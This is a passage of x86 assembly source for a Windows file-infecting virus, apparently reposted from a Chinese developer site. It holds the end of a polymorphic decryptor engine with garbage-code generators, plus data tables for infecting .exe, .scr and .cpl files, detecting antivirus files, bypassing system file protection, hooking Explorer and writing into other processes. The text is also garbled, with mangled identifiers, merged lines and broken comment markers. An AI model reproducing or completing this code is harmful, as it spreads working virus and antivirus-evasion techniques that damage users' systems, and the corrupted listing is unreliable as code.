Do_Call: Push Ecx; Gen Call to Each Step

CMP ECX, 00000003H

JNE IS_NOT_LOOP

Call Gengarbageex

MOV DWORD PTR [EBP LOOP_POINT], EDI

IS_NOT_LOOP: CALL GENGARBAGEEX

Call get_rnd32

And Al, 01H

JZ MutateCall

StandardCall: MOV Al, 0E8H; Call Opcode

Stosb

Lodsd

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

JMP DonemutateCall

Callstepadd: MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Lodsd

Call fromPoly2rva

Sub Eax, EDX

Stosd

RET

Callstepsub: MOV AX, 0E881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Lodsd

Call fromPoly2rva

NEG EAX

Add Eax, EDX

Stosd

RET

Callstepxor: MOV AX, 0F081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

Lodsd

Call fromPoly2rva

XOR EAX, EDX

Stosd

RET

MUTATECALL: PUSH ESI

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

Push EAX

Push EBX

Call Gengarbageex

POP EBX

MOV EAX, NumcallstepCall Get_rnd_Range

LEA ESI, DWORD PTR [EBP TBL_CALL_STEP EAX * 04H]

Lodsd

Add Eax, EBP

POP EDX

POP ESI

Push EBX

Call EAX

Call Gengarbageex

POP EBX

MOV AX, 0D0FFH

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

DonemutateCall: Call GENGARBAGEX

Lodsd

POP ECX

Loop do_call

Call gengarbageex; end condition

Call gen_loop

Call gen_rnd_block

POP EBX

Push EDI

SUB EDI, DWORD PTR [EBP PTRTODECRYPT]

Push EDI

MOV EDI, DWORD PTR [EBP PTRTOCRYPT]

Add Edi, EBX

Call fixed_size2ecx; Encrypt Requested Area

LOOP_HIDE_CODE: PUSH ECX

MOV EAX, DWORD PTR [EDI]

Call perform_crypt

XOR ECX, ECX

MOV CL, BYTE PTR [EBP OPER_SIZE]

LOOP_COPY_RES: Stosb

SHR EAX, 08H

Loop loop_copy_res

POP ECX

Loop loop_hide_code

MOV EDX, DWORD PTR [EBP Entry_Point]

Sub EDX, EBX; Get Entry-Point Offset

POP ECX

POP EDI

RET

; ================================================== ===========================

Poly Engine Initialized Data

; ================================================== ===========================

; ================================================== ===========; Register Table

;

; 00h -> Byte -> Register Mask

; 01H -> BYTE -> Register Flags

; ================================================== ===========

TBL_REGS EQU $

DB 00000000B, REG_READ_ONLY; EAX

TBL_REG_EBX DB 00000011B, 00H; EBX

DB 00000001B, 00H; ECX

DB 00000010B, 00H; EDX

TBL_REG_ESI DB 00000110B, REG_NO_8BIT; ESI

TBL_REG_EDI DB 00000111B, REG_NO_8bit; EDI

TBL_REG_EBP DB 00000101B, REG_NO_8BIT; EBP

END_REGS EQU $

; ================================================== ===========

Aliases for REG TABLE STRUCTURE

; ================================================== ===========

REG_MASK EQU 00H

REG_FLAGS EQU 01H

; ================================================== ===========; Bit Aliases for REG FLAGS

; ================================================== ===========

REG_IS_INDEX EQU 01H; Register Used As Main Index Register

REG_IS_COUNTER EQU 02H; this Register IS Used As Loop Counter

REG_READ_ONLY EQU 04H; Never Modify The Value of this Register

REG_NO_8BIT EQU 08H; ESI EDI AND EBP HAVENT 8BIT VERSION

; ================================================== ===========

; Initial Reg Flags

; ================================================== ===========

TBL_STARTUP EQU $

DB REG_READ_ONLY; EAX

DB 00H; EBX

DB 00H; ECX

DB 00H; EDX

DB REG_NO_8bit; ESI

DB REG_NO_8bit; EDI

DB REG_NO_8bit; EBP

; ================================================== ===========; Code That Does Not Disturb Reg Values

; ================================================== ===========

TBL_SAVE_CODE EQU $

CLC

STC

CMC

CLD

STD

END_SAVE_CODE EQU $

; ================================================== ===========

Generators for [R] indexing mode

; ================================================== ===========

TBL_IDX_REG EQU $

DD Offset XX_INC_REG

DD Offset XX_DEC_REG

DD Offset XX_NOT_REG

DD Offset XX_ADD_REG

DD Offset XX_SUB_REG

DD offset xx_xor_reg

; ================================================== ===========; Generators for [REG IMM] indexing mode

; ================================================== ===========

TBL_DIS_REG EQU $

DD Offset YY_INC_REG

DD Offset YY_DEC_REG

DD Offset YY_NOT_REG

DD Offset YY_ADD_REG

DD Offset YY_SUB_REG

DD Offset YY_XOR_REG

; ================================================== ===========

Generators for [REG REG] INDEXING MODE

; ================================================== ===========

TBL_XTENDED EQU $

DD Offset ZZ_INC_REG

DD Offset ZZ_DEC_REG

DD Offset ZZ_NOT_REG

DD Offset ZZ_ADD_REG

DD Offset ZZ_SUB_REG

DD Offset ZZ_XOR_REG

; ================================================== ===========; GENERATORS for [REG REG IMM] indexing mode

; ================================================== ===========

TBL_PARANOIA EQU $

DD Offset II_INC_REG

DD Offset II_DEC_REG

DD Offset II_NOT_REG

DD Offset II_ADD_REG

DD Offset II_SUB_REG

DD Offset II_XOR_REG

; ================================================== ===========

Opcodes for Math Reg, IMM

; ================================================== ===========

TBL_MATH_IMM EQU $

DB 0C0H; Add

DB 0C8H; OR

DB 0E0H; And

DB 0E8H; SUB

DB 0F0H; xor

DB 0D0H; ADC

DB 0D8H; SBB

END_MATH_IMM EQU $

; ================================================== ===========; Magic Aliases

; ================================================== ===========

Magic_putKey EQU 01H

Magic_putdisp EQU 02H

Magic_ENDSTR EQU 0FFH

Magic_ENDKEY EQU 0FEH

Magic_careebp EQU 00H

Magic_notebp EQU 0FFH

; ================================================== ===========

Magic Data

; ================================================== ===========

XX_INC_REG DB 0FEH

DB Magic_Careebp

DB 00H

DB 00H

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

XX_DEC_REG DB 0FEH

DB Magic_Careebp

DB 08H

DB 00H

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

XX_NOT_REG DB 0F6H

DB Magic_Careebp

DB 10h

DB 00H

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD OFFSET X_NOT_REG_DWORDXX_ADD_REG DB 80H

DB Magic_Careebp

DB 00H

DB Magic_putKey

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

XX_SUB_REG DB 80H

DB Magic_Careebp

DB 28h

DB Magic_putKey

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

XX_XOR_REG DB 80H

DB Magic_Careebp

DB 30h

DB Magic_putKey

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

YY_INC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 80h

DB Magic_putdisp

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

YY_DEC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 88H

DB Magic_putdisp

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

YY_NOT_REG DB 0F6H

DB MAGIC_NOTEBP

DB 90h

DB Magic_putdisp

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

YY_ADD_REG DB 80H

DB MAGIC_NOTEBP

DB 80h

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

YY_SUB_REG DB 80H

DB MAGIC_NOTEBP

DB 0A8H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

YY_XOR_REG DB 80H

DB MAGIC_NOTEBP

DB 0B0H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

ZZ_INC_REG DB 0FEH

DB Magic_Careebp

DB 04H

DB 00H

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

ZZ_DEC_REG DB 0FEH

DB Magic_Careebp

DB 0CH

DB 00H

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

ZZ_NOT_REG DB 0F6H

DB Magic_Careebp

DB 14h

DB 00H

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

ZZ_ADD_REG DB 80HDB MAGIC_CAREBP

DB 04H

DB Magic_putKey

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

ZZ_SUB_REG DB 80H

DB Magic_Careebp

DB 2ch

DB Magic_putKey

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

ZZ_XOR_REG DB 80H

DB Magic_Careebp

DB 34H

DB Magic_putKey

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

II_INC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 84H

DB Magic_putdisp

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

II_DEC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 8ch

DB Magic_putdisp

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

II_NOT_REG DB 0F6H

DB MAGIC_NOTEBP

DB 94H

DB Magic_putdisp

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

II_ADD_REG DB 80H

DB MAGIC_NOTEBP

DB 84H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

II_SUB_REG DB 80H

DB MAGIC_NOTEBP

DB 0ch

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

II_XOR_REG DB 80H

DB MAGIC_NOTEBP

DB 0B4H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

; ================================================== ===========

Reverse-Code Strings

; ================================================== =========== x_inc_reg_byte DB 02H, 0FEH, 0C8H, MAGIC_ENDSTR

X_INC_REG_WORD DB 02H, 66H, 48H, Magic_ENDSTR

X_INC_REG_DWORD DB 01H, 48H, MAGIC_ENDSTR

X_DEC_REG_BYTE DB 02H, 0FEH, 0C0H, MAGIC_ENDSTR

X_DEC_REG_WORD DB 02H, 66H, 40H, MAGIC_ENDSTR

X_DEC_REG_DWORD DB 01H, 40H, MAGIC_ENDSTR

X_Not_Reg_Byte DB 02H, 0F6H, 0D0H, Magic_ENDSTR

X_Not_Reg_word DB 03H, 66H, 0F7H, 0D0H, Magic_ENDSTR

X_NOT_REG_DWORD DB 02H, 0F7H, 0D0H, MAGIC_ENDSTR

X_ADD_REG_BYTE DB 01H, 2CH, MAGIC_ENDKEY

X_add_reg_word DB 02H, 66H, 2DH, MAGIC_ENDKEY

X_add_reg_dword DB 01H, 2DH, MAGIC_ENDKEY

X_SUB_REG_BYTE DB 01H, 04H, MAGIC_ENDKEY

X_SUB_REG_WORD DB 02H, 66H, 05H, MAGIC_ENDKEY

X_SUB_REG_DWORD DB 01H, 05H, MAGIC_ENDKEY

X_XOR_REG_BYTE DB 01H, 34H, MAGIC_ENDKEY

X_XOR_REG_WORD DB 02H, 66H, 35H, Magic_ENDKEY

X_XOR_REG_DWORD DB 01H, 35H, Magic_ENDKEY

; ================================================== ===========

Format for Each Style-Table Entry:

;

; 00h -> DWORD -> Address of Generator

; 04H -> DWORD -> Address of generated subs

; 00000000H IF not yet generated

;

; ================================================== =========== STYLE_TABLE EQU $

DD Offset Gen_Load_ptr

DD 00000000h

DD Offset Gen_Load_ctr

DD 00000000h

DD Offset Gen_Decrypt

DD 00000000h

DD Offset Gen_Next_Step

DD 00000000h

DD offset gen_next_ctr

DD 00000000h

; ================================================== ===========

Generators for Incrementing The Index Register

; ================================================== ===========

TBL_IDX_UP EQU $

DD Offset IDXUPWITHADD

DD Offset IDXUPWITHSUB

DD Offset IDXUPWithinc

DD Offset IDXUpAddadd

DD Offset IDXUpAddsub

DD Offset IDXUpsubsub

DD Offset IDXUpsubadd

Numidxup EQU ($ -TBL_IDX_UP) / 04H

; ================================================== ===========

Misc generators

; ================================================== =========== TBL_JMP_END EQU $

DD Offset JMpendREGADD

DD Offset JMpendRegsub

DD Offset JMpendRegxor

Numjmpend EQU ($ -TBL_JMP_END) / 04H

TBL_CALL_STEP EQU $

DD Offset Callstepadd

DD Offset Callstepsub

DD Offset Callstepxor

Numcallstep EQU ($ -TBL_CALL_STEP) / 04H

TBLDOFOG EQU $

DD Offset DofogAdd

DD Offset Dofogsub

DD Offset DofogXor

Numfog EQU ($ -TBLDOFOG) / 04H

TBLFIXFOG EQU $

DD Offset FixfogAdd

DD Offset Fixfogsub

DD Offset Fixfogxor

Numfixfog EQU ($ -TBLFIXFOG) / 04H

; ================================================== ===========

Generators for Decrementing The Index Register

; ================================================== ===========

TBL_IDX_DOWN EQU $

DD Offset IDXDownwithadd

DD Offset IDXDownWithSub

DD Offset IDXDOWNDEC

DD Offset IDXDOWNADDADDDDDDDD

DD Offset IDXDSUB

DD Offset IDXDownsubsub

DD Offset IDXDOWNSUBADD

NumIDXDown EQU ($ -TBL_IDX_DOWN) / 04H

; ================================================== ===========; Garbage Code Generators

; ================================================== ===========

TBL_I_G EQU $

DD Offset Gen_Save_code; CLC STC CMC CLD STD

DD offset gen_mov_mem32; MOV MEM, REG32

DD offset gen_mov_mem16; MOV MEM, REG16

DD offset gen_mov_mem8; MOV MEM, REG8

DD offset gen_add_mem32; add mem, reg32

DD offset gen_add_mem16; add mem, reg16

DD offset gen_add_mem8; add mem, reg8

DD offset gen_sub_mem32; SUB MEM, REG32

DD Offset Gen_Sub_mem16; Sub Mem, REG16

DD offset gen_sub_mem8; Sub Mem, Reg8

DD offset gen_adc_mem32; adc MEM, REG32

DD offset gen_adc_mem16; adc MEM, REG16

DD offset gen_adc_mem8; adc Mem, Reg8

DD Offset Gen_SBB_MEM32; SBB MEM, REG32

DD Offset Gen_SBB_MEM16; SBB MEM, REG16

DD Offset Gen_SBB_MEM8; SBB MEM, REG8

DD offset gen_or_mem32; or mem, reg32

DD offset gen_or_mem16; or mem, reg16

DD offset gen_or_mem8; or mem, reg8

DD offset gen_and_mem32; and mem, reg32

DD offset gen_and_mem16; and mem, reg16

DD offset gen_and_mem8; and mem, reg8

DD offset gen_xor_mem32; xor Mem, Reg32

DD offset gen_xor_mem16; xor Mem, Reg16

DD Offset Gen_xor_mem8; xor Mem, Reg8

END_I_G EQU $

TBL_GARBAGE EQU $

DD Offset Gen_Save_code; CLC STC CMC CLD STD

DD Offset G_MovReg32Immm; Mov Reg32, IMM

DD Offset G_MovReg16Immm; Mov Reg16, Immdd Offset G_Movreg8 IMM; MOV REG8, IMM

DD Offset g_xchgregreg32; xchg reg32, reg32

DD Offset g_xchgregreg16; xchg reg16, reg16

DD offset g_xchgregream; xchg reg8, reg8

DD Offset G_MovRegreg32; Mov Reg32, Reg32

DD Offset G_Movregreg16; Mov Reg16, Reg16

DD Offset G_MovRegReg8; Mov Reg8, REG8

DD Offset G_inc_Reg32; Inc REG32

DD offset g_inc_reg16; increg16

DD Offset G_inc_Reg8; Inc REG8

DD Offset G_Dec_reg32; Dec Reg32

DD OFFSET G_DEC_REG16; DEC REG16

DD Offset G_Dec_reg8; Dec Reg8

DD Offset G_MathRegimm32; Math REG32, IMM

DD Offset G_MathRegimm16; Math Reg16, IMM

DD Offset G_MathRegimm8; Math REG8, IMM

DD Offset G_Movzx_movsx; Movzx / Movsx Reg32, Reg16

Save_space EQU $

DD offset gen_mov_mem32; MOV MEM, REG32

DD offset gen_mov_mem16; MOV MEM, REG16

DD offset gen_mov_mem8; MOV MEM, REG8

DD offset gen_add_mem32; add mem, reg32

DD offset gen_add_mem16; add mem, reg16

DD offset gen_add_mem8; add mem, reg8

DD offset gen_sub_mem32; SUB MEM, REG32

DD Offset Gen_Sub_mem16; Sub Mem, REG16

DD offset gen_sub_mem8; Sub Mem, Reg8

DD offset gen_adc_mem32; adc MEM, REG32

DD offset gen_adc_mem16; adc MEM, REG16

DD offset gen_adc_mem8; adc Mem, Reg8

DD Offset Gen_SBB_MEM32; SBB MEM, REG32

DD Offset Gen_SBB_MEM16; SBB MEM, REG16

DD Offset Gen_SBB_MEM8; SBB MEM, REG8

DD offset gen_or_mem32; or mem, reg32

DD offset gen_or_mem16; or mem, reg16

DD offset gen_or_mem8; or mem, reg8

DD offset gen_and_mem32; and mem, reg32

DD offset gen_and_mem16; and mem, reg16

DD offset gen_and_mem8; and mem, reg8

DD offset gen_xor_mem32; xor Mem, Reg32

DD offset gen_xor_mem16; xor Mem, Reg16

DD Offset Gen_xor_mem8; xor Mem, Reg8

DD Offset g_push_g_pop; Push REG / GARBAGE / POP REG

DD OFFSET G_CALL_CONT; CALL / GARBAGE / POP

DD OFFSET G_JUMP_U; JUMP / RND BlockddDDDDD G_Jump_c; Jump Conditional / Garbage

DD offset gen_fake_crypt; fake decryptor instruction

END_GARBAGE EQU $

; ================================================== ===========

Polypush

; ================================================== ===========

TBLDOPUSH EQU $

Pushebx DB 053H

Pushesi DB 056H

Pushedi db 057h

Pushebp DB 055H

; ================================================== ===========

Polypop

; ================================================== ===========

TBLDOPOP EQU $

Popebx db 05dh

POPESI DB 05FH

Popedi DB 05EH

Popebp db 05bh

; ================================================== ===========================; CRC32 of API Names

; ================================================== ===========================

CRCKERNEL32 DD 00000000H; CRC32 of Kernel DLL NAME

CRCGetProcaddr DD 00000000h; this API Takes Special Care

CRC32K32APIS DD NUMK32APIS DUP (00000000H)

CRC32TOOLHELPAPIS DD NUMTOOLHELPAPIPIPIPIP (00000000H)

CRC32PSAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIS DUP (00000000H)

CRC32IMGHLPAPIS DD NUMIMGHLPAPIS DUP (00000000H)

CRC32SFCAPIS DD NUMSFCAPIS DUP (00000000H)

CRC32USER32APISW9X DD NUMUSER32APIS DUP (00000000H)

CRC32USER32APISWNT DD NUMUSER32APIS DUP (00000000H)

CRC32_ISDEBUGPR DD 00000000H

CRC32_REGSERVPROC DD 00000000H

; ================================================== ===========================

; CRC32 of Infectable File Extensions

; ================================================== ============================ tc 3c 3

CRC32_SZEXE DD 00000000H

CRC32_SZSCR DD 00000000H

CRC32_SZCPL DD 00000000H

Numberofext EQU ($ -TBLCRC32SZEXT) / 04H

; ================================================== ===========================

CRC32 of Explorer.exe and user32.dll

; ================================================== ===========================

CRCSZEXPLORER DD 00000000H

CRCSZUSER32 DD 00000000H

CRCSZPSAPI DD 00000000H

CRCSZIMGHLP DD 00000000H

CRCSZSFC DD 00000000H

; ================================================== ============================; Avoid Some Files from Being Infected

; ================================================== ===========================

Avoid_TBL DD Avoid_Num DUP (00000000H)

; ================================================== ===========================

; CRC32 OF AV FILES

; ================================================== ===========================

TBLCRC32AV DD Numberofav DUP (00000000H)

; ================================================== ===========================; End of crc32 protected area

; ================================================== ===========================

SizeOfProtect EQU $ -Crc_Protace

; ================================================== ===========================

; End of Virus Image In Files

; ================================================== ===========================

INF_SIZE EQU $ -Viro_SYS

; ================================================== ===========================; Seed for Random Number Generator

; ================================================== ===========================

RND32_SEED DD 00000000H

; ================================================== ===========================

; CRC32 lookup Table

; ================================================== ===========================

TBL_CRC32 DD 0100H DUP (00000000H)

; ================================================== ===========================; kernel32 API's

; ================================================== ===========================

; GetProcaddress API Takes Special Care

A_GETPROCADDRESS DD 00000000H

EPK32APIS EQU $

A_createfilea DD 00000000H

A_createfilemappinga DD 00000000H

A_createProcessa DD 00000000H

a_createthread dd 00000000H

a_closehandle dd 00000000h

A_Deletefilea DD 00000000H

a_exitthread dd 00000000H

A_FindClose DD 00000000H

a_findfirstfilea dd 00000000h

A_FindNextFilea DD 00000000H

A_FREELIBRARY DD 00000000H

A_GetComputernamea DD 00000000H

A_GetcurrentProcess DD 00000000H

A_GetDriveTypea DD 00000000H

A_GETFileAttributesa DD 00000000H

A_GetLastError DD 00000000H

A_GETLOCALTIME DD 00000000H

A_GETLOGICALDRIVESTRINGSA DD 00000000H

A_GetsystemDirectorya DD 00000000H

A_GETVERSIONEX DD 00000000H

A_LoadLibrarya DD 00000000H

A_mapviewoffile dd 00000000H

a_openfilemappinga dd 00000000h

A_OpenProcess DD 00000000H

A_ReadProcessMemory DD 00000000H

a_setendoffile dd 00000000h

A_setfileAttributesa DD 00000000H

a_setfilepointer dd 00000000h

A_setFileTime DD 00000000ha_Sleep DD 00000000H

a_unmapviewoffile dd 00000000h

A_WriteProcessMemory DD 00000000H

Numk32apis EQU ($ -EPK32APIS) / 04H

Only Used When Present

A_IndebuggerPresent DD 00000000h

Hkernel32 DD 00000000H

; ================================================== ===========================

Used to Check Current Computer Name

; ================================================== ===========================

SizeOfComputername DD 00000000H

Szcomputername DB 20H DUP (00h)

; ================================================== ===========================

Buffer Used On Misc Routines

; ================================================== ================================================================================================================================================================================= ptes DD 00000000H

BUFSTRFILENAME DB MAX_PATH 01H DUP (00000000H)

; ================================================== ===========================

; End of Virus Virtual Image

; ================================================== ===========================

SIZE_VIRTUAL EQU $ -Viro_sys

; ================================================== ===========================

Structure Used by getversionex

; ================================================== ==================================================================================================================================================================================

DWOSVERSIONFOSIZE DD 00000000H

DWmajorversion DD 00000000H

DWMINORVERSION DD 00000000H

DWBUILDNUMBER DD 00000000H

DWPLATFORMID DD 00000000H

SZCSDVERSION DB 80H DUP (00h)

VER_PLATFORM_WIN32S EQU 00H

VER_PLATFORM_WIN32_WINDOWS EQU 01H

VER_PLATFORM_WIN32_NT EQU 02H

; ================================================== ===========================

Variables use by the windows 9x residency routines

; ================================================== ===========================

HSnapshot DD 00000000H

Processentry EQU $

ProcedWsize DD 00000000H

Procecntusage DD 00000000H

Proceth32Processid DD 00000000H

Proceth32Defaultheapid DD 00000000H

Proceth32ModuleID DD 00000000H

Procecntthreads DD 00000000H

Proceth32ParentProcessid DD 00000000HProcepcpriclesBase DD 00000000H

Procedwflags DD 00000000H

Proceszexefile DB Max_Path DUP (00h)

SizeOfProcesSsentry EQU ($ -ProcesSsentry)

ModuleEntry EQU $

Modedwsize DD 00000000H

Modeth32ModuleID DD 00000000H

Modeth32Processid DD 00000000H

Modeglblcntusage DD 00000000H

ModeProccntusage DD 00000000H

ModemodBaseAddr DD 00000000H

Modemodbasesize DD 00000000h

ModehModule DD 00000000H

MODESZMODULE DB MAX_MODULE_NAME32 1 DUP (00h)

MODESZEXEPATH DB MAX_PATH DUP (00h)

SizeOfmoduleEntry EQU ($ -ModuleEntry)

MAX_MODULE_NAME32 EQU 255

; ================================================== ===========================

Variables use by the windows NT and Windows 2000 Residency Routines

; ================================================== ===========================

HProcess DD 00000000H

HModule DD 00000000H

ProcessidList DD 20H DUP (00000000H)

ModuleList DD 20H DUP (00000000H)

Explorer_mz_lfaNew DD 00000000H

Explorer_fh_sizeofoptionalHeader DW 0000h

Explorer_fh_numberofsections dw 0000h

Explorer_sectionHeader DB image_sizeof_section_Header DUP (00h)

Explorer_DE_IMPORT DD 00000000HEXPLORER_IMPORTDESCRIPTOR DB image_sizeof_import_descriptor DUP (00h)

Explorer_id_name DB 10h DUP (00h)

PARSEDLNAMEERRORPROTECTION DB 00H

Explorer_Hook DD 00000000H

Explorer_patch dd 00000000H

Explorer_init_hook DD 00000000H

; ================================================== ===========================

; This is virus infection thread ID

; ================================================== ===========================

IF_threadid DD 00000000H

; ================================================== ===========================

This is used to locate system dll files and loading the usout using names,

Only by Means of CRC32

; ================================================== ============================================================================== a_SDLL_CRC32 DD 00000000h

SzsystemDir DB MAX_PATH DUP (00h)

; ================================================== ===========================

; Toolhelp API's (Windows 9x Only)

; ================================================== ===========================

Eptool Helpapis Equ $

a_createtoolhelp32snapshot dd 00000000H

A_Process32First DD 00000000H

A_Process32Next DD 00000000H

A_Module32First DD 00000000H

A_Module32Next DD 00000000H

NumTool Helpapis EQU ($ -eptoolhelpapis) / 04H

; ================================================== ===========================; PSAPI API's (Windows NT & Windows 2000 ONLY)

; ================================================== ===========================

Eppsapiapis Equ $

A_enumprocessModules DD 00000000H

A_enumprocesses DD 00000000H

A_GETMODULEBASENAMEA DD 00000000H

A_GETMODULINFORMATION DD 00000000H

Numpsapiapis EQU ($ -Eppsapiapis) / 04H

HPSAPI DD 00000000H

; ================================================== ===========================

; ImageHLP APIS Used to Compute New Image Checksum

; ================================================== =========================== Epimghlpapis EQU $

a_checksummappedfile dd 00000000h

NumImghlPapis EQU ($ -epImghlpapis) / 04H

HIMGHLP DD 00000000H

; ================================================== ===========================

; SFC APIS Used by the Virus to Avoid Windows 2000 System File Protection

; ================================================== ===========================

EPSFCAPIS EQU $

a_sfcisfileprotected dd 00000000h

NUMSFCAPIS EQU ($ -epsfcapis) / 04H

HSFC DD 00000000H

; ================================================== ===========================; user32 apis (the address is for the ansi versioniffness if the target is running

Windows 9x or The Wide Version if Running Windows NT).

; ================================================== ===========================

EPUSER32APIS EQU $

A_DEFWINDOWPROC DD 00000000H

Numuser32apis EQU ($ -epuser32apis) / 04H

HUSER32 DD 00000000H

; ================================================== ===========================

Handles over Target Files

; ================================================== =========================== h_createfile dd 00000000H

H_FileMap DD 00000000H

; ================================================== ===========================

Misc Variables

; ================================================== ===========================

CurfileAttr DD 00000000H

Checksumpe DD 00000000H

Oldchecksum DD 00000000H

Map_is_here dd 00000000h

FileImport DD 00000000H

Importsh DD 00000000H

INJECT_OFFS DD 00000000H

Vir_offset DD 00000000H

Search_Raw DD 00000000H

Host_Base DD 00000000H

Virus_sh dd 00000000H

FIX_SIZE DD 00000000H

Raw_align DD 00000000H

K32codestart DD 00000000H

K32CODEEND DD 00000000H

; ================================================== ===========================; Poly Engine Uninitialized Data

; ================================================== ===========================

Crypt_direction EQU 01H

Crypt_cmpctr EQU 02H

Crypt_cdir EQU 04H

Crypt_simplex EQU 10H

Crypt_complex EQU 20H

Crypt_fog EQU 40h

PTRTOCRYPT DD 00000000H; Pointer To Area to Encrypt

PTRTODECRYPT DD 00000000H; WHERE to Generate Polymorphic Decryptor

PTRToEP DD 0000000000H; Pointer to Code Entry-Point ONCE DECRYPTED

Sizecrypt DD 0000000000; Size of Area To Encrypt

End_Value DD 0000000000; Index End Value

LOOP_POINT DD 00000000H; Start Address of Decryption Loop

Entry_Point DD 0000000000; Entry Point To Decryptor Code

Decryptor_size DD 00000000H; Size of Generated Decryptor

Disp2disp DD 00000000H; Displacement over Displacement

Condition_ptr DD 00000000H; Pointer to JZ / JNZ INSTRUCTION AT LOOP END

XRND1 DD 00000000H

XrndReg DD 00000000H

XRndFixPtr DD 00000000H

XrndMath DD 00000000H

Counter_mask db 00h; Mask of Register Used As Counter

Recursive_level db 00h; Garbage Recursive Layer

IsFirst DB 00H; Save Registers Only on 1st Decryptorfake_field EQU $

PTR_DISP DD 00000000H; Displacement from Index

FAKE_PTR_DISP DD 00000000h; ... And fake one

Crypt_key DD 0000000000; Encryption Key

FAKE_CRYPT_KEY DD 00000000h; ... and fake one

Build_Flags DB 00H; Some Decryptor Flags

FAKE_BUILD_FLAGS DB 00H; ... and fake?

Oper_size db 00h; size used (1 = byte 2 = word 4 = DWORD)

FAKE_OPER_SIZE DB 00H; ... And Fake ONE

Index_mask db 00h; Mask of Register Used As Index

FAKE_INDEX_MASK DB 00H; ... and fake one

TBLSTDPSHP EQU $

DD 00000000h

DD 00000000h

DD 00000000h

DD 00000000h

PSHPSTEPINDEX DD 00000004H DUP (00000000H)

Num_da EQU 10H

NumberofDataAareas DB 00H

TBL_DATA_AREA DB NUM_DA * 08H DUP (00h)

; ================================================== ===========================

SystemTIME STRUCTURE Used by getLocaltime

; ================================================== ===========================

Local_time EQU $

LT_Year DW 0000h

LT_MONTH DW 0000H

LT_dayofweek dw 0000h

LT_day dw 0000h

LT_HOUR DW 0000h

LT_MINUTE DW 0000H

LT_second dw 0000h

LT_MilliseConds DW 0000h

; ================================================== ===========================; a Rect structure used in the payload

; ================================================== ===========================

WindowRect EQU $

WR_LEFT DD 0000000000h

WR_TOP DD 0000000000h

WR_Right DD 00000000H

WR_BOTTOM DD 00000000H

; ================================================== ===========================

; This is a Win32 Finddata Structure Used to Infect Files, And Some

AUXILIARY VARIABLES

; ================================================== =================================== FileSizeOnDisk DD 00000000H

FATSIZE DD 00000000H

FT_CREATIONTIME DB 08H DUP (00h)

FT_LASTACCESSTIME DB 08H DUP (00h)

FT_LASTWRITIME DB 08H DUP (00h)

H_find DD 00000000H

DirectFindData DB sizeOf_win32_find_data dup (00h)

; ================================================== ===========================

Used to Retrieve Current, Windows and System DirectorIES, WINDOWS AND SYSTEM DIRECTORIES

; ================================================== ===========================

BUFGETDIR DB MAX_PATH 01H DUP (00000000H)

; ================================================== ===========================; use to get Logical Drives

; ================================================== ===========================

Sizeof_ldsb Equ Max_path

SzlogicalDrives DB SizeOf_ldsb DUP (00000000H)

; ================================================== ===========================

; End of Virus Image IN Allocated Memory

; ================================================== ===========================

Alloc_size EQU $ -Viro_sys

Virseg Ends

End host_code

转载请注明原文地址:https://www.9cbs.com/read-37444.html

New Post(0)